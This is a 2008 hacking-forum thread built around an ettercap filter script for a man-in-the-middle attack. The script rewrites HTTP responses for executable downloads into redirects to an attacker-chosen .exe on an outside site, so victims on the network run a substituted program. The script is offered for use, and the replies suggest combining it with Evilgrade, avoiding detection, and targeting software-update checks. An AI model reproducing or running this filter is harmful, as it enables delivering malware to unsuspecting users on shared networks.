operat0r_001 Posted August 19, 2008 Share Posted August 19, 2008 ettercap / etterfilter man in the middle ownage Basically replace any EXE downloaded with your own :) 08/14/2008 - VIDEO: http://blip.tv/file/1185726/ replace all downloaded EXE's with a 301 redirect to a different exe and site # replace rmccurdy with your website # replace the url with what ever exe you like if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("keep-alive", "close" "); replace("Keep-Alive", "close" "); } if (ip.proto == TCP && search(DATA.data, ": application") ){ # enable for logging log(DECODED.data, "/tmp/log.log"); msg("found EXE\n"); # "Win32" is the first part of the exe example: # if the EXE started with "this program must be run in MSDOS mode" you could search for MSDOS etc .. if (search(DATA.data, "Win32")) { msg("doing nothing\n"); } else { replace("200 OK", "301 Moved Permanently Location: http://www.rmccurdy.com/scripts/quickclean.exe "); msg("redirect success\n"); } } Quote Link to comment Share on other sites More sharing options...
Sparda Posted August 19, 2008 Share Posted August 19, 2008 How often are executable files downloaded? Not often. You'd need to do some thing else like rewrite links to download an executable as well. Quote Link to comment Share on other sites More sharing options...
mubix Posted August 19, 2008 Share Posted August 19, 2008 Dude, Boris, it's a good script, especially if you integrate it with Evilgrade. Yes, rewriting links would be good too but then you are a lot more detectable. Now, if you can download, modify images into GIFs and rewrite links while adding execution to those GIFs. THEN you have something. Quote Link to comment Share on other sites More sharing options...
PileOfMush Posted August 21, 2008 Share Posted August 21, 2008 So many apps check for updates every time you start them now... I wonder if anyone has ever compiled a list of the most popular of these apps to target for MITM redirection attacks. Like if Firefox were redirected to an exploit site and said "oh look, new version available"... and the exe offered wasn't called "haxploit-1337.exe" a lot of ppl would run it. Quote Link to comment Share on other sites More sharing options...
operat0r_001 Posted January 14, 2009 Author Share Posted January 14, 2009 yes you can use mod rewrite or a tinyhttpd filter etc but this is small and only requires root and ettercap and is easy to change Quote Link to comment Share on other sites More sharing options...
DingleBerries Posted January 14, 2009 Share Posted January 14, 2009 Nice work operator I can see plenty of uses for this. Quote Link to comment Share on other sites More sharing options...
Machstorm Posted January 15, 2009 Share Posted January 15, 2009 There is a Man in the Middle plug in that you can get for Ettercap then all you have to do is supply the website with modified links. I did something like this for Cyber Security and redirected traffic from Microsoft.com to a site about switching to Linux. I imagine if you somehow spoofed the site that you wanted to, you could modify the links to suit your needs. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.